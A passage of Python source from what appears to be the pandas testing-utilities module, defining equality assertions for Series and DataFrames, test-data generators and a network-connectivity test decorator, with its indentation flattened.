# instance validation
_check_isinstance(left, right, Series)
if check_series_type:
# ToDo: There are some tests using rhs is sparse
# lhs is dense. Should use assert_class_equal in future
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# length comparison
if len(left) != len(right):
msg1 = f"{len(left)}, {left.index}"
msg2 = f"{len(right)}, {right.index}"
raise_assert_detail(obj, "Series length are different", msg1, msg2)
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj=f"{obj}.index",
)
if check_dtype:
# We want to skip exact dtype checking when `check_categorical`
# is False. We'll still raise if only one is a `Categorical`,
# regardless of `check_categorical`
if (
is_categorical_dtype(left)
and is_categorical_dtype(right)
and not check_categorical
):
pass
else:
assert_attr_equal("dtype", left, right, obj=f"Attributes of {obj}")
if check_exact:
assert_numpy_array_equal(
left._internal_get_values(),
right._internal_get_values(),
check_dtype=check_dtype,
obj=str(obj),
)
elif check_datetimelike_compat:
# we want to check only if we have compat dtypes
# e.g. integer and M|m are NOT compat, but we can simply check
# the values in that case
if needs_i8_conversion(left) or needs_i8_conversion(right):
# datetimelike may have different objects (e.g. datetime.datetime
# vs Timestamp) but will compare equal
if not Index(left.values).equals(Index(right.values)):
msg = (
f"[datetimelike_compat=True] {left.values} "
f"is not equal to {right.values}."
)
raise AssertionError(msg)
else:
assert_numpy_array_equal(
left._internal_get_values(),
right._internal_get_values(),
check_dtype=check_dtype,
)
elif is_interval_dtype(left) or is_interval_dtype(right):
assert_interval_array_equal(left.array, right.array)
elif is_extension_array_dtype(left.dtype) and is_datetime64tz_dtype(left.dtype):
# .values is an ndarray, but ._values is the ExtensionArray.
# TODO: Use .array
assert is_extension_array_dtype(right.dtype)
assert_extension_array_equal(left._values, right._values)
elif (
is_extension_array_dtype(left)
and not is_categorical_dtype(left)
and is_extension_array_dtype(right)
and not is_categorical_dtype(right)
):
assert_extension_array_equal(left.array, right.array)
else:
_testing.assert_almost_equal(
left._internal_get_values(),
right._internal_get_values(),
check_less_precise=check_less_precise,
check_dtype=check_dtype,
obj=str(obj),
)
# metadata comparison
if check_names:
assert_attr_equal("name", left, right, obj=obj)
if check_categorical:
if is_categorical_dtype(left) or is_categorical_dtype(right):
assert_categorical_equal(left.values, right.values, obj=f"{obj} category")
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_column_type="equiv",
check_frame_type=True,
check_less_precise=False,
check_names=True,
by_blocks=False,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_like=False,
obj="DataFrame",
):
"""
Check that left and right DataFrame are equal.
This function is intended to compare two DataFrames and output any
differences. Is is mostly intended for use in unit tests.
Additional parameters allow varying the strictness of the
equality checks performed.
Parameters
----------
left : DataFrame
First DataFrame to compare.
right : DataFrame
Second DataFrame to compare.
check_dtype : bool, default True
Whether to check the DataFrame dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_column_type : bool or {'equiv'}, default 'equiv'
Whether to check the columns class, dtype and inferred_type
are identical. Is passed as the ``exact`` argument of
:func:`assert_index_equal`.
check_frame_type : bool, default True
Whether to check the DataFrame class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
check_names : bool, default True
Whether to check that the `names` attribute for both the `index`
and `column` attributes of the DataFrame is identical.
by_blocks : bool, default False
Specify how to compare internal data. If False, compare by columns.
If True, compare by blocks.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_like : bool, default False
If True, ignore the order of index & columns.
Note: index labels must match their respective rows
(same as in columns) - same labels must be with the same data.
obj : str, default 'DataFrame'
Specify object name being compared, internally used to show appropriate
assertion message.
See Also
--------
assert_series_equal : Equivalent method for asserting Series equality.
DataFrame.equals : Check DataFrame equality.
Examples
--------
This example shows comparing two DataFrames that are equal
but with columns of differing dtypes.
>>> from pandas._testing import assert_frame_equal
>>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
>>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
df1 equals itself.
>>> assert_frame_equal(df1, df1)
df1 differs from df2 as column 'b' is of a different type.
>>> assert_frame_equal(df1, df2)
Traceback (most recent call last):
...
AssertionError: Attributes of DataFrame.iloc[:, 1] (column name="b") are different
Attribute "dtype" are different
[left]: int64
[right]: float64
Ignore differing dtypes in columns with check_dtype.
>>> assert_frame_equal(df1, df2, check_dtype=False)
"""
__tracebackhide__ = True
# instance validation
_check_isinstance(left, right, DataFrame)
if check_frame_type:
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# shape comparison
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shape mismatch", f"{repr(left.shape)}", f"{repr(right.shape)}",
)
if check_like:
left, right = left.reindex_like(right), right
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj=f"{obj}.index",
)
# column comparison
assert_index_equal(
left.columns,
right.columns,
exact=check_column_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj=f"{obj}.columns",
)
# compare by blocks
if by_blocks:
rblocks = right._to_dict_of_blocks()
lblocks = left._to_dict_of_blocks()
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(
lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.iloc[:, i]
rcol = right.iloc[:, i]
assert_series_equal(
lcol,
rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_names=check_names,
check_datetimelike_compat=check_datetimelike_compat,
check_categorical=check_categorical,
obj=f'{obj}.iloc[:, {i}] (column name="{col}")',
)
def assert_equal(left, right, **kwargs):
"""
Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.
Parameters
----------
left, right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
The two items to be compared.
**kwargs
All keyword arguments are passed through to the underlying assert method.
"""
__tracebackhide__ = True
if isinstance(left, pd.Index):
assert_index_equal(left, right, **kwargs)
elif isinstance(left, pd.Series):
assert_series_equal(left, right, **kwargs)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(left, right, **kwargs)
elif isinstance(left, IntervalArray):
assert_interval_array_equal(left, right, **kwargs)
elif isinstance(left, PeriodArray):
assert_period_array_equal(left, right, **kwargs)
elif isinstance(left, DatetimeArray):
assert_datetime_array_equal(left, right, **kwargs)
elif isinstance(left, TimedeltaArray):
assert_timedelta_array_equal(left, right, **kwargs)
elif isinstance(left, ExtensionArray):
assert_extension_array_equal(left, right, **kwargs)
elif isinstance(left, np.ndarray):
assert_numpy_array_equal(left, right, **kwargs)
elif isinstance(left, str):
assert kwargs == {}
assert left == right
else:
raise NotImplementedError(type(left))
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.Index:
expected = pd.Index(expected)
elif box_cls is pd.Series:
expected = pd.Series(expected)
elif box_cls is pd.DataFrame:
expected = pd.Series(expected).to_frame()
if transpose:
# for vector operations, we we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length.
expected = expected.T
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
def to_array(obj):
# temporary implementation until we get pd.array in place
if is_period_dtype(obj):
return period_array(obj)
elif is_datetime64_dtype(obj) or is_datetime64tz_dtype(obj):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(obj):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(
left,
right,
check_dtype=True,
check_kind=True,
check_fill_value=True,
consolidate_block_indices=False,
):
"""Check that the left and right SparseArray are equal.
Parameters
----------
left : SparseArray
right : SparseArray
check_dtype : bool, default True
Whether to check the data dtype is identical.
check_kind : bool, default True
Whether to just the kind of the sparse index for each column.
check_fill_value : bool, default True
Whether to check that left.fill_value matches right.fill_value
consolidate_block_indices : bool, default False
Whether to consolidate contiguous blocks for sparse arrays with
a BlockIndex. Some operations, e.g. concat, will end up with
block indices that could be consolidated. Setting this to true will
create a new BlockIndex for that array, with consolidated
block indices.
"""
_check_isinstance(left, right, pd.arrays.SparseArray)
assert_numpy_array_equal(left.sp_values, right.sp_values, check_dtype=check_dtype)
# SparseIndex comparison
assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
if not check_kind:
left_index = left.sp_index.to_block_index()
right_index = right.sp_index.to_block_index()
else:
left_index = left.sp_index
right_index = right.sp_index
if consolidate_block_indices and left.kind == "block":
# we'll probably remove this hack...
left_index = left_index.to_int_index().to_block_index()
right_index = right_index.to_int_index().to_block_index()
if not left_index.equals(right_index):
raise_assert_detail(
"SparseArray.index", "index are not equal", left_index, right_index
)
else:
# Just ensure a
pass
if check_fill_value:
assert_attr_equal("fill_value", left, right)
if check_dtype:
assert_attr_equal("dtype", left, right)
assert_numpy_array_equal(left.to_dense(), right.to_dense(), check_dtype=check_dtype)
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, f"Did not contain item: {repr(k)}"
def assert_copy(iter1, iter2, **eql_kwargs):
"""
iter1, iter2: iterables that produce elements
comparable with assert_almost_equal
Checks that the elements are equal, but not
the same object. (Does not check that items
in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
msg = (
f"Expected object {repr(type(elem1))} and object {repr(type(elem2))} to be "
"different objects, but they were the same object."
)
assert elem1 is not elem2, msg
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k=10, name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
return dr
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
* name : object dtype with string names
* id : int dtype with
* x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = pd.DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def all_index_generator(k=10):
"""Generator which can be iterated over to get instances of all the various
index classes.
Parameters
----------
k: length of each of the index instances
"""
all_make_index_funcs = [
makeIntIndex,
makeFloatIndex,
makeStringIndex,
makeUnicodeIndex,
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeBoolIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
]
for make_index_func in all_make_index_funcs:
yield make_index_func(k=k)
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
for make_index_func in make_index_funcs:
yield make_index_func
def all_timeseries_index_generator(k=10):
"""Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(N)
return Series(randn(N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(N)
return Series(randn(N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(N)
data = Index(data, dtype=object)
index = makeStringIndex(N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(N)
return {c: Series(randn(N), index=index) for c in getCols(K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = N
return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""Create an index/multindex with given dimensions, levels, names, etc'
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) is nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = dict(
i=makeIntIndex,
f=makeFloatIndex,
s=makeStringIndex,
u=makeUnicodeIndex,
dt=makeDateIndex,
td=makeTimedeltaIndex,
p=makePeriodIndex,
).get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
cnt = Counter()
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
tuples.append(result)
tuples = list(zip(*tuples))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
nrows, ncols - number of data rows/cols
c_idx_names, idx_names - False/True/list of strings, yields No names ,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples:
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingCustomDataframe(
nrows,
ncols,
density=0.9,
random_state=None,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Parameters
----------
Density : float, optional
Float in (0, 1) that gives the percentage of non-missing numbers in
the DataFrame.
random_state : {np.random.RandomState, int}, optional
Random number generator or random seed.
See makeCustomDataframe for descriptions of the rest of the parameters.
"""
df = makeCustomDataframe(
nrows,
ncols,
c_idx_names=c_idx_names,
r_idx_names=r_idx_names,
c_idx_nlevels=c_idx_nlevels,
r_idx_nlevels=r_idx_nlevels,
data_gen_f=data_gen_f,
c_ndupe_l=c_ndupe_l,
r_ndupe_l=r_ndupe_l,
dtype=dtype,
c_idx_type=c_idx_type,
r_idx_type=r_idx_type,
)
i, j = _create_missing_idx(nrows, ncols, density, random_state)
df.values[i, j] = np.nan
return df
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
def optional_args(decorator):
"""allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
args = []
return dec(f)
else:
return dec
return wrapper
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
"timed out",
"Server Hangup",
"HTTP Error 503: Service Unavailable",
"502: Proxy Error",
"HTTP Error 502: internal error",
"HTTP Error 502",
"HTTP Error 503",
"HTTP Error 403",
"HTTP Error 400",
"Temporary failure in name resolution",
"Name or service not known",
"Connection refused",
"certificate verify",
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on exception types in _get_default_network_errors
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
"""Try to connect to the given url. True if succeeds, False if IOError
raised
Parameters
----------
url : basestring
The URL to try to connect to
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
if error_classes is None:
error_classes = _get_default_network_errors()
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
@optional_args
def network(
t,
url="http://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=None,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring network connection and, if an error is
encountered, only raise if it does not find a network connection.
In comparison to ``network``, this assumes an added contract to your test:
you must assert that, under normal conditions, your test will ONLY fail if
it does not have network connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
url : path
The url to test via ``pandas.io.common.urlopen`` to check
for connectivity. Defaults to 'http://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
Any exception that has .errno or .reason.erno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
message. Intended to suppress errors where an errno isn't available.
Notes
-----
* ``raise_on_error`` supercedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
Tests decorated with @network will fail if it's possible to make a network
connection to another URL (defaults to google.com)::
>>> from pandas._testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
Traceback
...
URLError: <urlopen error unknown url type: rabit>
You can specify alternative URLs::
>>> @network("http://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
Errors not related to networking will always be raised.
"""
from pytest import skip
if error_classes is None:
error_classes = _get_default_network_errors()
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if check_before_test and not raise_on_error:
if not can_connect(url, error_classes):
skip()
try:
return t(*args, **kwargs)
except Exception as err:
errno = getattr(err, "errno", None)
if not errno and hasattr(errno, "reason"):
errno = getattr(err.reason, "errno", None)
if errno in skip_errnos:
skip(f"Skipping test due to known errno and error {err}")
e_str = str(err)
if any(m.lower() in e_str.lower() for m in _skip_on_messages):
skip(
f"Skipping test because exception message is known and error {err}"
)
if not isinstance(err, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
skip(f"Skipping test due to lack of connectivity and error {err}")
return wrapper
with_connectivity_check = network
@contextmanager
def assert_produces_warning(
expected_warning=Warning,
filter_level="always",
clear=None,
check_stacklevel=True,
raise_on_extra_warnings=True,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Parameters
----------
expected_warning : {Warning, False, None}, default Warning
The type of Exception raised. ``exception.Warning`` is the base
class for all warnings. To check that no warning is returned,
specify ``False`` or ``None``.
filter_level : str or None, default "always"
Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
clear : str, default None
If not ``None`` then remove any previously raised warnings from
the ``__warningsregistry__`` to ensure that no warning messages are
suppressed by this context manager. If ``None`` is specified,
the ``__warningsregistry__`` keeps track of which warnings have been
shown, and does not show them again.
check_stacklevel : bool, default True
If True, displays the line that called the function containing
the warning to show were the function is called. Otherwise, the
line that implements the function is displayed.
